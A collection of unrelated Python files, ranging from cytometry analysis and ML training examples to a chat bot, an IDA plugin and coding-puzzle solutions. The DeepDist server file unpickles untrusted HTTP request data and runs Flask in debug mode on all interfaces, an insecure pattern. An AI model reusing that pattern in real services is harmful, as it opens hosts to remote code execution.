# for m in consts.functional_markers:
# name = m.split("(")[0]
# o = sorted(thresholds[m])
# if mixes[m] == 2:
# pos[m] = quant[m] > thresholds[m][o[0]]
# else:
# pos[m] = quant[m] > thresholds[m][o[-1]]
# sel = pos[m] == False
# pos.loc[sel, m] = quant.loc[sel, m] > thresholds[m][o[-2]]
# pos = pd.concat([pos, quant[ids]], axis=1)
# pos.to_parquet(gating_file)
# pos = pd.read_parquet(gating_file)
# pos.index.name = "obj_id"
# p = pos.merge(roi_attributes["phenotypes"].reset_index())
po = pos.groupby("roi").sum()
total = pos.groupby("roi").size()
perc = (po.T / total).T * 100
fig, stats = swarmboxenplot(
data=perc.join(roi_attributes),
x="phenotypes",
y=consts.functional_markers,
)
# by cell type
m = pos.merge(a.obs, on=["sample", "roi", "obj_id"])
po = m.groupby(["metacluster_labels_2.0", "roi"])[
consts.functional_markers
].sum()
total = m.groupby(["metacluster_labels_2.0", "roi"]).size()
perc = (po.T / total).T.fillna(0) * 100
grid = clustermap(perc.groupby(level=0).mean())
p = (
perc.join(roi_attributes["phenotypes"])
.groupby(["metacluster_labels_2.0", "phenotypes"])
.mean()
)
grid = clustermap(p, row_cluster=False)
grid = clustermap(p, row_cluster=False, col_cluster=False)
grid = clustermap(p.T, config="z", row_cluster=False, col_cluster=False)
grid = clustermap(p, config="z", row_cluster=False, col_cluster=False)
# fig, stats = swarmboxenplot(
# data=perc.join(roi_attributes),
# x="phenotypes",
# y=consts.functional_markers,
# )
# Try using hard thresholds (doesn't work)
# zquant = a.to_df()
# zquant.index = zquant.index.astype(str)
# pos = (zquant[consts.functional_markers] > 3).join(a.obs[ids])
# pos.index = pos.index.astype(int)
# pos.index.name = 'obj_id'
def intra_metacluster(prj: Project) -> None:
(consts.output_dir / "refined_cell_types").mkdir()
prefix = consts.output_dir / "phenotyping" / prj.name + "."
h5ad_f = prefix + "sample_zscore.labeled.h5ad"
a = sc.read(h5ad_f)
res = 2.0
metaclusters = a.obs[f"metacluster_labels_{res}"].unique()
metaclusters = [
"T cells",
"Neutrophils",
"Macrophages|Monocytes",
"Endothelial",
"Epithelial",
"B cells",
"NK cells",
]
for metacluster in metaclusters:
output_prefix = (
consts.output_dir
/ "refined_cell_types"
/ metacluster.replace(" ", "_").replace("|", "-")
+ "."
)
ta = a[a.obs[f"metacluster_labels_{res}"].str.contains(metacluster), :]
ta = ta[:, ~ta.var.index.isin(consts.tech_channels)]
# sc.pp.scale(ta)
sc.pp.pca(ta)
with parallel_backend("threading", n_jobs=12):
sc.pp.neighbors(ta, n_neighbors=15, use_rep="X_pca")
with parallel_backend("threading", n_jobs=12):
sc.tl.umap(ta, gamma=25)
nres = 1.0
sc.tl.leiden(ta, resolution=nres, key_added=f"refined_cluster_{nres}")
ta.obs[f"refined_cluster_{nres}"] = pd.Categorical(
ta.obs[f"refined_cluster_{nres}"].astype(int) + 1
)
ta.uns["phenotypes_colors"] = consts.colors["phenotypes"]
# UMAPs
# vmin = None
# vmax = np.percentile(ta.raw.X, 99, axis=0).tolist() + [None] * 4
# fig = sc.pl.umap(
# ta,
# # color=functional_markers
# color=ta.var.index.tolist()
# + [
# f"cluster_{res}",
# f"refined_cluster_{nres}",
# "phenotypes",
# "sample",
# ],
# use_raw=True,
# vmin=vmin,
# vmax=vmax,
# show=False,
# )[0].figure
# rasterize_scanpy(fig)
# fig.savefig(output_prefix + "umap.markers.raw.svgz", **consts.figkws)
fig = sc.pl.umap(
ta,
# color=functional_markers
color=ta.var.index.tolist()
+ [
f"cluster_{res}",
f"refined_cluster_{nres}",
"phenotypes",
"sample",
],
use_raw=False,
show=False,
)[0].figure
rasterize_scanpy(fig)
fig.savefig(output_prefix + "umap.markers.svgz", **consts.figkws)
# Plot cluster phenotypes
# # get mean per cluster
m = ta.to_df().groupby(ta.obs[f"cluster_{nres}"]).mean()
umap_pos = (
pd.DataFrame(
ta.obsm["X_umap"],
index=ta.obs.index,
columns=["UMAP1", "UMAP2"],
)
.groupby(ta.obs[f"cluster_{nres}"])
.mean()
)
m = m.join(umap_pos)
# # get normalized proportions per disease group
ct = ta.obs["phenotypes"].value_counts()
ct /= ct.sum()
c = ta.obs.groupby([f"refined_cluster_{nres}", "phenotypes"]).size()
p = c.groupby(level=0).apply(lambda x: x / x.sum())
p = p.to_frame().pivot_table(
index=f"refined_cluster_{nres}", columns="phenotypes", values=0
)
p = np.log(p / ct)
grid = clustermap(
m, row_colors=p, config="z", figsize=(8, 4 * max(1, res))
)
grid.fig.savefig(
output_prefix + "clustermap.svg",
**consts.figkws,
)
def filter_out_cells(
quant: DataFrame, plot=True, output_prefix: Path = None
) -> Array:
from imc.operations import get_population
from imc.utils import minmax_scale
from mpl_toolkits.mplot3d import Axes3D
# create combined score for artifact likelihood
score = minmax_scale(
(minmax_scale(quant["solidity"]) * 2)
* (1 - minmax_scale(quant["area"]))
* (1 - minmax_scale(quant["DNA"]))
)
# get population with highest score
## KMeans with k == 3 also works well but we have to assume smallest cluster is to remove
# from sklearn.cluster import KMeans
# al = KMeans(3)
# al.fit(score.values.reshape((-1, 1)))
# c = al.predict(score.values.reshape((-1, 1)))
# to_filter = c == pd.Series(c).value_counts().idxmin()
## Mixture of gaussians
to_filter = get_population(score, min_mix=3)
if plot:
assert output_prefix is not None
fig = plt.figure()
ax = fig.add_subplot(111, projection="3d")
for sel, edgecolor in [(to_filter, "red"), (~to_filter, "black")]:
s = ax.scatter(
quant.loc[sel]["solidity"],
np.sqrt(quant.loc[sel]["area"]),
np.log1p(quant.loc[sel]["DNA"]),
s=2,
alpha=0.25,
c=score[sel],
edgecolors=edgecolor,
linewidths=0.25,
rasterized=True,
)
fig.colorbar(s, ax=ax, label="score")
ax.set(xlabel="solidity", ylabel="area", zlabel="DNA")
fig.savefig(output_prefix + "3d_scatter.svg", **consts.figkws)
fig, axes = plt.subplots(1, 3, figsize=(3 * 4, 1 * 4), sharey=True)
for ax, var in zip(axes, ["area", "DNA", "solidity"]):
sns.distplot(
quant[var][~to_filter], label="To keep", kde=False, ax=ax
)
sns.distplot(
quant[var][to_filter], label="To remove", kde=False, ax=ax
)
ax.set_xlabel(var)
ax.legend()
axes[0].set_ylabel("Cell number")
fig.savefig(
output_prefix + "per_variable_histogram.svg", **consts.figkws
)
return to_filter
def example_visualizations(prj) -> None:
from imc.graphics import get_grid_dims
from csbdeep.utils import normalize
output_dir = consts.output_dir / "example_visualizations"
output_dir.mkdir()
examples = [
# ((roi_name, example_name), (pos=((y2, y2), (x2, x1)), markers))
(
(
"A20_77_20210121_ActivationPanel-06",
"S100A9_reduct_in_monos_covid",
),
(
None,
[
"CD14",
"S100A9",
"DNA",
],
),
),
(
(
"A20_77_20210121_ActivationPanel-06",
"S100A9_reduct_in_monos_covid_zoom",
),
(
((1200, 940), (1000, 740)),
[
"CD14",
"S100A9",
"DNA",
],
),
),
(
(
"A19_33_20210121_ActivationPanel-04",
"S100A9_high_in_monos_healthy3",
),
(
None,
[
"CD14",
"S100A9",
"DNA",
],
),
),
(
(
"A19_33_20210121_ActivationPanel-04",
"S100A9_high_in_monos_healthy3_zoom",
),
(
((400, 140), (700, 440)),
[
"CD14",
"S100A9",
"DNA",
],
),
),
(
("A20_77_20210121_ActivationPanel-05", "HLADR_in_keratin_covid"),
(
None,
[
"HLADR",
"Keratin818",
"DNA",
],
),
),
(
(
"A20_77_20210121_ActivationPanel-05",
"HLADR_in_keratin_covid_zoom",
),
(
((260, 20), (790, 550)),
[
"HLADR",
"Keratin818",
"DNA",
],
),
),
(
(
"A19_33_20210121_ActivationPanel-04",
"HLADR_not_in_keratin_healthy",
),
(
None,
[
"HLADR",
"Keratin818",
"DNA",
],
),
),
(
(
"A19_33_20210121_ActivationPanel-04",
"HLADR_not_in_keratin_healthy_zoom",
),
(
((460, 220), (520, 280)),
[
"HLADR",
"Keratin818",
"DNA",
],
),
),
(
("A20_58_20210122_ActivationPanel-06", "pNFkbp65_in_monos_covid"),
(None, ["CD16", "pNFkbp65", "DNA"]),
),
(
("A20_58_20210122_ActivationPanel-06", "VISTA_not_in_Tcells"),
(None, ["VISTA", "CD3(", "CD15"]),
),
(
("A20_58_20210122_ActivationPanel-06", "TIM3_not_in_Tcells"),
(None, ["TIM3", "CD3(", "CD15"]),
),
(
("A20_58_20210122_ActivationPanel-06", "PDL1_not_in_Tcells"),
(None, ["PDL1", "CD3(", "CD15"]),
),
(
("A20_58_20210122_ActivationPanel-06", "PD1_not_in_Tcells"),
(None, ["PD1", "CD3(", "CD15"]),
),
(
("A20_58_20210122_ActivationPanel-08", "VISTA_not_in_Tcells2"),
(None, ["VISTA", "CD3(", "CD15"]),
),
(
("A20_58_20210122_ActivationPanel-08", "VISTA_not_in_Tcells2_zoom"),
(((600, 340), (1200, 940)), ["VISTA", "CD3(", "CD15"]),
),
]
examples = [
(
("A19_33_20210121_ActivationPanel-02", "S100A9_low_in_Healthy"),
(None, ["S100A9", "CD15", "Keratin818"]),
),
(
("A20_47_20210120_ActivationPanel-07", "S100A9_high_in_COVIDearly"),
(None, ["S100A9", "CD15", "Keratin818"]),
),
(
("A20_77_20210121_ActivationPanel-04", "S100A9_high_in_COVIDlate"),
(None, ["S100A9", "CD15", "Keratin818"]),
),
(
("A19_33_20210121_ActivationPanel-02", "S100A9_low_in_Healthy2"),
(None, ["S100A9", "CD15", "DNA"]),
),
(
("A20_47_20210120_ActivationPanel-07", "S100A9_high_in_COVIDearly"),
(None, ["S100A9", "CD15", "DNA"]),
),
(
("A20_77_20210121_ActivationPanel-04", "S100A9_high_in_COVIDlate2"),
(None, ["S100A9", "CD15", "DNA"]),
),
]
for example in examples:
(roi_name, example_name), (pos, markers) = example
roi = prj.get_rois(roi_name)
fig1 = roi.plot_channels(
markers, equalize=False, position=pos, smooth=3
)
fig1.savefig(
output_dir / f"examples.{example_name}.separate.svg",
**consts.figkws,
)
fig2 = roi.plot_channels(
markers[:3],
equalize=False,
position=pos,
merged=True,
# smooth=1
)
fig2.savefig(
output_dir / f"examples.{example_name}.merged.svg", **consts.figkws
)
# plot manually
from imc.graphics import add_scale
from skimage.filters import gaussian
p = np.asarray(
[
gaussian(normalize(x), sigma=1)
for x in roi._get_channels(markers[:3])[1]
]
)
if pos is not None:
p = p[:, slice(pos[0][1], pos[0][0]), slice(pos[1][1], pos[1][0])]
fig3, ax = plt.subplots(figsize=(4, 4))
ax.imshow(np.moveaxis(normalize(p), 0, -1))
add_scale(ax)
ax.axis("off")
fig3.savefig(
output_dir / f"examples.{example_name}.merged.smooth.svg",
**consts.figkws,
)
@dataclass
class consts:
cur_date = f"{datetime.datetime.now().date()}"
figkws = dict(bbox_inches="tight", dpi=300)
metadata_dir = Path("metadata")
data_dir = Path("data")
results_dir = Path("results")
output_dir = results_dir / "imc_revision"
output_dir.mkdir()
# Sample-specific
phenotypes = (
pd.Series(
{
"A19_33_20210121_ActivationPanel": "Healthy",
"A19_33_20210122_ActivationPanel": "Healthy",
"S19_6699_20210120_ActivationPanel": "Healthy",
"A20_47_20210120_ActivationPanel": "COVID19_early",
"A20_58_20210122_ActivationPanel": "COVID19_early",
"A20_56_20210120_ActivationPanel": "COVID19_late",
"A20_77_20210121_ActivationPanel": "COVID19_late",
},
name="phenotypes",
)
.rename_axis(index="sample")
.astype(
pd.CategoricalDtype(
ordered=True,
categories=["Healthy", "COVID19_early", "COVID19_late"],
)
)
)
colors = {
"phenotypes": [
matplotlib.colors.to_hex(x)
for x in np.asarray(sns.color_palette("tab10"))[[2, 4, 3]]
],
"disease": [
matplotlib.colors.to_hex(x)
for x in np.asarray(sns.color_palette("tab10"))[[2, 3]]
],
}
# Load cluster assignments
cluster_idents = json.load(
open(metadata_dir / "imc_revision.cluster_identities.json")
)
cluster_idents = {
float(res): {int(c): n for c, n in clusts.items()}
for res, clusts in cluster_idents.items()
}
# Subset markers
exclude_channels = [
"80ArAr(ArAr80)",
"129Xe(Xe129)",
"190BCKG(BCKG190)",
"<EMPTY>(Pb204)",
]
tech_channels = [
"perimeter",
"DNA",
"major_axis_length",
"eccentricity",
"solidity",
"DNA",
"HistoneH3(In113)",
]
functional_markers = [
"pH3s28(In115)",
"Ki67",
"CD45RO(Nd142)",
"GATA3(Dy164)",
"TBet(Sm149)",
"GranzymeB(Er167)",
"pNFkbp65(Er166)",
"CD27(Yb171)",
"CD86(Sm152)",
"CD44(Eu153)",
"CD127(Er168)",
"CD123(Tm169)",
"CD38(Pr141)",
"CD161(Gd158)",
"S100A9(Yb173)",
"HLADR(Ho165)",
"CleavedCaspase3(Yb172)",
"PD1(Nd150)",
"PDL1(Lu175)",
"VISTA(Gd160)",
"TIM3(Nd145)",
]
"""
# To quickly convert svgz to pdf (faster than saving as pdf directly)
for F in `find results/imc_revision -name "*.svgz"`
do
if [ ! -f ${F/svgz/pdf} ]; then
echo $F
sleep 1
inkscape -o ${F/svgz/pdf} $F 2> /dev/null
fi
done
"""
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
sys.exit(1)
|
from cx_Freeze import setup, Executable
import os
os.environ['TCL_LIBRARY'] = "C:\\Users\\danilo\\AppData\\Local\\Programs\\Python\\Python36-32\\tcl\\tcl8.6"
os.environ['TK_LIBRARY'] = "C:\\Users\\danilo\\AppData\\Local\\Programs\\Python\\Python36-32\\tcl\\tk8.6"
include_files=["C:\\Users\\danilo\\AppData\\Local\\Programs\\Python\\Python36-32\\DLLs\\tcl86t.dll",
"C:\\Users\\danilo\\AppData\\Local\\Programs\\Python\\Python36-32\\DLLs\\tk86t.dll",
".\\modes",
".\\keyboard",
".\\maps"]
base = None
executables = [Executable("main.py", base=base)]
# Dependencies are automatically detected, but it might need fine tuning.
build_exe_options = {
'packages': ["tkinter","mido","os","yaml","threading","time"],
'include_files': include_files,
'excludes': ['unittest', 'test']
}
# GUI applications require a different base on Windows
base = "Win32GUI"
setup (
name = "pianopad",
version = "0.1",
description = "El perro, el perro, is mi corazon...",
options = {"build_exe": build_exe_options},
executables = [Executable("pianopad.py", base=base)]
) |
import sqlite3
class DeliveryServiceAPI:
def __init__(self):
self.APIDB = sqlite3.connect('delivery_service.db')
self.APIDB.execute('''create table if not exists courier_images (
bill_number unique not null,
courier_image not null,
primary key(bill_number)
)''')
def getcourierPicData(self, billNum):
picData = self.APIDB.execute('select courier_image from courier_images where bill_number = ?', (billNum,))
result = b''
for data, in picData:
result = data
return result
def recordcourierInfo(self, billNum, courierImage):
self.APIDB.execute("insert into courier_images(bill_number, courier_image) values(?,?)", (billNum, courierImage))
self.APIDB.commit()
def deleteUserData(self, billNum): # --수정해야함
self.APIDB.execute('delete from courier_images where bill_number = ?', (billNum,))
self.APIDB.commit()
if __name__ =="__main__":
testAPI = DeliveryServiceAPI()
testBillNum = '1111111111111'
data=b''
with open("picture/ju.jpg","rb") as f:
data=f.read()
testAPI.recordcourierInfo(testBillNum,data)
|
import os
class segmentation(object):
def __init__(self):
self.__report = None
@property
def report(self):
print('print out the report')
class lungSeg(segmentation):
def __init__(self):
super(lungSeg, self).__init__()
self.__show = None
@property
def show(self):
print('this is segmentation result')
|
#!/usr/bin/env pypy3
# -*- coding: UTF-8 -*-
n,m=map(int,input().split())
a=set([input() for i in range(n)])
b=set([input() for i in range(m)])
chk=a&b
a-=chk
b-=chk
print('YES' if (len(a)>len(b)-len(chk)%2) else 'NO')
|
"""
This example is based on Determined's MNIST PyTorch example.
This file is a how-to example for multiple learning rate schedulers
in Determined.
"""
from typing import Any, Dict, Sequence, Tuple, Union, cast
import torch
from torch import nn
from torch.optim.lr_scheduler import _LRScheduler
from layers import Flatten # noqa: I100
import determined as det
from determined.pytorch import DataLoader, PyTorchTrial, reset_parameters, LRScheduler
import data
import torchvision
TorchData = Union[Dict[str, torch.Tensor], Sequence[torch.Tensor], torch.Tensor]
class MultiLRScheduler(_LRScheduler):
def __init__(self, lr1, lr2, optimizer, last_epoch=-1):
self.lr1 = lr1
self.lr2 = lr2
super(MultiLRScheduler, self).__init__(optimizer, last_epoch)
def load_state_dict(self, state_dict):
lr1_state = state_dict["lr1"]
lr2_state = state_dict["lr2"]
del state_dict["lr1"]
del state_dict["lr2"]
super().load_state_dict(state_dict)
self.lr1.load_state_dict(lr1_state)
self.lr2.load_state_dict(lr2_state)
def state_dict(self):
state = super().state_dict()
state["lr1"] = self.lr1.state_dict()
state["lr2"] = self.lr2.state_dict()
state['last_epoch'] = self.last_epoch
state['_step_count'] = self._step_count
return state
def step(self, epoch=None):
if epoch is None and self.last_epoch < 0:
'''
During initalization, PyTorch schedulers call .step().
Therefore, self.lr1 and self.lr2 have already had the initial .step()
called. We need to then just set the main class variables.
'''
self._step_count = 1
self.last_epoch = 0
else:
if epoch is None:
epoch = self.last_epoch + 1
self.last_epoch = epoch
self.lr1.step()
self.lr2.step()
self._last_lr = [group['lr'] for group in self.optimizer.param_groups]
class MNistTrial(PyTorchTrial):
def __init__(self, context: det.TrialContext) -> None:
self.context = context
# Create a unique download directory for each rank so they don't overwrite each other.
self.download_directory = f"/tmp/data-rank{self.context.distributed.get_rank()}"
self.data_downloaded = False
def build_training_data_loader(self) -> DataLoader:
if not self.data_downloaded:
self.download_directory = data.download_dataset(
download_directory=self.download_directory,
data_config=self.context.get_data_config(),
)
self.data_downloaded = True
dataset = data.get_dataset(self.download_directory, train=True)
return DataLoader(dataset, batch_size=self.context.get_per_slot_batch_size())
def build_validation_data_loader(self) -> DataLoader:
if not self.data_downloaded:
self.download_directory = data.download_dataset(
download_directory=self.download_directory,
data_config=self.context.get_data_config(),
)
self.data_downloaded = True
validation_data = data.get_dataset(self.download_directory, train=False)
return DataLoader(validation_data, batch_size=self.context.get_per_slot_batch_size())
def create_lr_scheduler(self, optimizer: torch.optim.Optimizer):
self.Lr2 = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, 100)
self.Lr1 = torch.optim.lr_scheduler.StepLR(optimizer, 1)
self.combined_lrs = MultiLRScheduler(self.Lr1, self.Lr2, optimizer)
# Because we are calling .step() ourselves in our MultiLRScheduler we need to
# set the StepMode to MANUAL_STEP.
return LRScheduler(self.combined_lrs, step_mode=LRScheduler.StepMode.MANUAL_STEP)
def build_model(self) -> nn.Module:
model = nn.Sequential(
nn.Conv2d(1, self.context.get_hparam("n_filters1"), 3, 1),
nn.ReLU(),
nn.Conv2d(
self.context.get_hparam("n_filters1"), self.context.get_hparam("n_filters2"), 3,
),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Dropout2d(self.context.get_hparam("dropout1")),
Flatten(),
nn.Linear(144 * self.context.get_hparam("n_filters2"), 128),
nn.ReLU(),
nn.Dropout2d(self.context.get_hparam("dropout2")),
nn.Linear(128, 10),
nn.LogSoftmax(),
)
# If loading backbone weights, do not call reset_parameters() or
# call before loading the backbone weights.
reset_parameters(model)
return model
def optimizer(self, model: nn.Module) -> torch.optim.Optimizer: # type: ignore
self.optimizer = torch.optim.Adadelta(model.parameters(), lr=self.context.get_hparam("learning_rate"))
return self.optimizer
def train_batch(
self, batch: TorchData, model: nn.Module, epoch_idx: int, batch_idx: int
) -> Dict[str, torch.Tensor]:
batch = cast(Tuple[torch.Tensor, torch.Tensor], batch)
data, labels = batch
output = model(data)
loss = torch.nn.functional.nll_loss(output, labels)
self.combined_lrs.step()
return {"loss": loss}
def evaluate_batch(self, batch: TorchData, model: nn.Module) -> Dict[str, Any]:
batch = cast(Tuple[torch.Tensor, torch.Tensor], batch)
data, labels = batch
output = model(data)
validation_loss = torch.nn.functional.nll_loss(output, labels).item()
pred = output.argmax(dim=1, keepdim=True)
accuracy = pred.eq(labels.view_as(pred)).sum().item() / len(data)
return {"validation_loss": validation_loss, "accuracy": accuracy}
|
# MTH 437 HW 1
# 0.0 X0
# Author: Paul Glenn
from math import cos
x = 2.0 #Initial guess
eps = 1.1*10**-16 #Just allows it to terminate with near-perfect agreement
g = open('HW1.txt','w+')
while abs(cos(x)-x)>eps:
x = cos(x)
g.write('guess = {:<20} | cos(x) = {:^10}'.format(repr(x),repr(cos(x)))+'\n')
#repr so no digits left behind; also meets criteria for string output
g.close()
|
import re
from symphony.bdk.core.activity.command import CommandContext
from symphony.bdk.core.service.datafeed.real_time_event_listener import RealTimeEventListener
from symphony.bdk.gen.agent_model.v4_initiator import V4Initiator
from symphony.bdk.gen.agent_model.v4_message_sent import V4MessageSent
from symphony.bdk.gen.pod_model.v3_room_attributes import V3RoomAttributes
from symphony.bdk.core.service.message.message_service import MessageService
from .activities import EchoCommandActivity, GreetUserJoinedActivity
from .gif_activities import GifSlashCommand, GifFormReplyActivity
class MessageListener(RealTimeEventListener):
def __init__(self, messages: MessageService):
self._messages = messages
super().__init__()
async def on_message_sent(self, initiator: V4Initiator, event: V4MessageSent):
message = event.message.message
message_text = re.sub('<[^<]+>', '', message)
if message_text.startswith("/order"):
form = "<form id=\"order\">"
form += "<text-field name=\"ticker\" placeholder=\"Ticker\" /><br />"
form += "<text-field name=\"quantity\" placeholder=\"Quantity\" /><br />"
form += "<text-field name=\"price\" placeholder=\"Price\" /><br />"
form += "<button type=\"action\" name=\"order\"> Place Order</button>"
form += "</form>"
await self._messages.send_message(event.message.stream.stream_id, form)
class FormListener(RealTimeEventListener):
def __init__(self, messages: MessageService):
self._messages = messages
super().__init__()
async def on_symphony_elements_action(self, initiator: V4Initiator, event: V4MessageSent):
if event.form_id == 'order':
values = event.form_values
reply_template = "Order placed for {quantity} of <cash tag =\"{ticker}\" /> @ {price}"
await self._messages.send_message(event.stream.stream_id, reply_template.format(**values)) |
import copy
import cPickle as pickle
from multiprocessing import Process
from rwlock import RWLock
import socket
import sys
from threading import Thread
import urllib2
import urlparse
"""Lightning-Fast Deep Learning on Spark
"""
class DeepDist:
def __init__(self, model, batch=None, master='127.0.0.1:5000'):
"""DeepDist - Distributed deep learning.
:param model: provide a model that can be trained in parallel on the workers
"""
self.model = model
self.lock = RWLock()
self.descent = lambda model, gradient: model
self.master = master
self.state = 'serving'
self.served = 0
self.received = 0
self.batch = batch
self.server = None
def __enter__(self):
Thread(target=self.start).start()
# self.server = Process(target=self.start)
# self.server.start()
return self
def __exit__(self, type, value, traceback):
# self.server.terminate()
pass # need to shut down server here
def start(self):
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def index():
return 'DeepDist'
@app.route('/model', methods=['GET', 'POST', 'PUT'])
def model_flask():
i = 0
while (self.state != 'serving') and (i < 1000):
time.sleep(1)
i += 1
self.lock.acquire_read()
self.served += 1
model = copy.deepcopy(self.model)
self.lock.release()
return pickle.dumps(model, -1)
@app.route('/update', methods=['GET', 'POST', 'PUT'])
def update_flask():
gradient = pickle.loads(request.data)
self.lock.acquire_write()
state = 'receiving'
self.received += 1
self.descent(self.model, gradient)
if self.received >= self.served:
self.received = 0
self.served = 0
self.state = 'serving'
self.lock.release()
return 'OK'
print 'Listening to 0.0.0.0:5000...'
app.run(host='0.0.0.0', debug=True, threaded=True, use_reloader=False)
def train(self, rdd, gradient, descent):
master = self.master # will be pickled
print 'master0: ', master
if master == None:
master = rdd.ctx._conf.get('spark.master')
print 'master1: ', master
if master.startswith('local['):
master = 'localhost:5000'
else:
if master.startswith('spark://'):
master = '%s:5000' % urlparse.urlparse(master).netloc.split(':')[0]
else:
master = '%s:5000' % master.split(':')[0]
print '\n*** master: %s\n' % master
self.descent = descent
batch = self.batch
def mapPartitions(data):
last = 'dummy'
class Iter:
def __iter__(self):
self.i = 0
return self
def next(self):
if (batch == None) or (self.i < batch):
self.i += 1
last = data.next()
return last
else:
return None
res = []
while last != None:
res.append(send_gradient(gradient(fetch_model(master=master), Iter()), master=master))
return res
return rdd.mapPartitions(mapPartitions).collect()
def fetch_model(master='localhost:5000'):
print '\n*** url: %s' % ('http://%s/model' % master)
request = urllib2.Request('http://%s/model' % master,
headers={'Content-Type': 'application/deepdist'})
return pickle.loads(urllib2.urlopen(request).read())
def send_gradient(gradient, master='localhost:5000'):
if not gradient:
return 'EMPTY'
request = urllib2.Request('http://%s/update' % master, pickle.dumps(gradient, -1),
headers={'Content-Type': 'application/deepdist'})
return urllib2.urlopen(request).read()
|
import idc
import idaapi
import idautils
PRE_ADDR = None
def clear():
heads = idautils.Heads(idc.SegStart(idc.ScreenEA()), idc.SegEnd(idc.ScreenEA()))
for i in heads:
idc.SetColor(i, idc.CIC_ITEM, 0xFFFFFF)
def get_new_color(current_color):
colors = [0xffe699, 0xffcc33, 0xe6ac00, 0xb38600]
if current_color == 0xFFFFFF:
return colors[0]
if current_color in colors:
pos = colors.index(current_color)
if pos == len(colors) - 1:
return colors[pos]
else:
return colors[pos + 1]
return 0xFFFFFF
def tracing():
global PRE_ADDR
event = idc.GetDebuggerEvent(idc.WFNE_ANY, -1)
if event <= 1:
idc.RunTo(idc.BeginEA())
idc.GetDebuggerEvent(idc.WFNE_SUSP, -1)
idc.EnableTracing(idc.TRACE_STEP, 1)
idc.GetDebuggerEvent(idc.WFNE_ANY | idc.WFNE_CONT, -1)
while True:
event = idc.GetDebuggerEvent(idc.WFNE_ANY, -1)
if event <= 1:
break
addr = idc.GetEventEa()
print event, "==>", hex(addr)
# judge breakpoint and same addr
if PRE_ADDR != addr:
PRE_ADDR = addr
else: # same addr
if event == idc.BREAKPOINT: # and now is breakpoint
break
current_color = idc.GetColor(addr, idc.CIC_ITEM)
new_color = get_new_color(current_color)
idc.SetColor(addr, idc.CIC_ITEM, new_color)
class InstructionTracing(idaapi.plugin_t):
flags = 0
wanted_name = "Instruction tracing"
wanted_hotkey = "Ctrl+Shift+j"
comment = "Coloring to each instruction executed"
help = "Ctrl+Shift+j: Run \n Ctrl+Shift+k: Clean"
def init(self):
return idaapi.PLUGIN_KEEP
def term(self):
pass
def run(self, arg):
clear()
tracing()
idaapi.add_hotkey("Ctrl+Shift+k", clear)
def PLUGIN_ENTRY():
return InstructionTracing()
|
class Solution1:
def maxDistToClosest(self, seats):
"""
:type seats: List[int]
:rtype: int
"""
i = 0
max_dis = 0
while i < len(seats):
if seats[i] == 1:
i += 1
continue
left = i
while left >= 0 and seats[left] != 1:
left -= 1
right = i
while right < len(seats) and seats[right] != 1:
right += 1
if left == -1:
max_dis = max(max_dis, right - i)
elif right == len(seats):
max_dis = max(max_dis, i - left)
else:
max_dis = max(max_dis, min(i - left, right - i))
i += 1
return max_dis
class Solution:
def maxDistToClosest(self, seats):
"""
:type seats: List[int]
:rtype: int
"""
seated = [idx for idx in range(len(seats)) if seats[idx] == 1]
max_dis = 0
for idx in range(len(seated) - 1):
dis = (seated[idx + 1] - seated[idx]) // 2
max_dis = max(dis, max_dis)
if seats[0] != 1:
max_dis = max(max_dis, seated[0])
if seats[-1] != 1:
max_dis = max(max_dis, len(seats) - seated[-1] - 1)
return max_dis
if __name__ == '__main__':
seats = [1, 0, 0, 0, 1, 0, 1]
res = Solution().maxDistToClosest(seats)
print(seats)
assert res == 2
seats = [1, 0, 0, 0]
res = Solution().maxDistToClosest(seats)
print(seats)
assert res == 3
seats = [0, 0, 1, 0, 1, 1]
res = Solution().maxDistToClosest(seats)
print(seats)
assert res == 2
|
from datetime import datetime
from dateutil import relativedelta
class AgeBarrier:
""" Holds various age barrier approaches available to the period. """
registry: dict[str, type['AgeBarrier']] = {}
def __init_subclass__(cls, name, **kwargs):
assert name not in cls.registry
cls.registry[name] = cls
super().__init_subclass__(**kwargs)
@classmethod
def from_name(cls, name, *args, **kwargs):
return cls.registry[name](*args, **kwargs)
def is_too_young(self, birth_date, start_date, min_age):
raise NotImplementedError()
def is_too_old(self, birth_date, start_date, max_age):
raise NotImplementedError()
class ExactAgeBarrier(AgeBarrier, name='exact'):
""" Checks the age by exact date.
The attendee can be 1 year too old (otherwise, the day the attendee
is a day older than the max age, he'll be rejected - in other word
the min age is exclusive, the max age is inclusive).
"""
def age(self, birth_date, start_date):
""" Calculates the age at the given date. """
if isinstance(birth_date, datetime):
birth_date = birth_date.date()
return relativedelta.relativedelta(start_date, birth_date).years
def is_too_young(self, birth_date, start_date, min_age):
return self.age(birth_date, start_date) < min_age
def is_too_old(self, birth_date, start_date, max_age):
return self.age(birth_date, start_date) > max_age
class YearAgeBarrier(AgeBarrier, name='year'):
""" Checks the age by using the year of the start_date and the age.
In German, we would say this is by "Jahrgang".
The person must be of that age during the year of the start date.
"""
def is_too_young(self, birth_date, start_date, min_age):
return (birth_date.year + min_age) > start_date.year
def is_too_old(self, birth_date, start_date, max_age):
return (birth_date.year + max_age + 1) < start_date.year
|
from ConfigParser import *
import os
import glob
import re
import sys
path = '/run/media/mzanotto/dataFast/renvision/experiments/P38_06_03_14_ret1/t0_modSmall_single_pca_cond_'
f1 = 'input_configuration'
f2 = 'confNumAndMI'
expParams = []
print 'BatchSize | k | Hidden | Delay | LearningRate | Delta | MI | R | MI/R'
for i in range(14,int(sys.argv[1])+1):
print str(i)+'.'
config = ConfigParser()
config.read(path+str(i)+'/'+f1)
try:
batch_size = config.getint('MAIN_PARAMETER_SETTING','batch_size')
except:
continue
expParams.append(batch_size)
k = config.getint('MAIN_PARAMETER_SETTING','k') # steps in CDk
expParams.append(format(k,'02d'))
n_hidden = config.getint('MODEL_PARAMETER_SETTING','n_hidden')
expParams.append(format(n_hidden,'02d'))
delay = config.getint('MODEL_PARAMETER_SETTING','delay')
expParams.append(format(delay,'02d'))
learning_rate = config.getfloat('MODEL_PARAMETER_SETTING','learning_rate')
expParams.append(format(learning_rate,'.2f'))
## n_gibbs_generate = config.getint('MODEL_PARAMETER_SETTING','n_gibbs_generate') # Gibbs iterations when generating predictions
## expParams.append(n_gibbs_generate)
delta = config.getint('MODEL_PARAMETER_SETTING','delta')
expParams.append(format(delta,'03d'))
with open(path+str(i)+'/'+f2) as f:
M,R = re.findall("\d+\.?\d*" ,f.read())
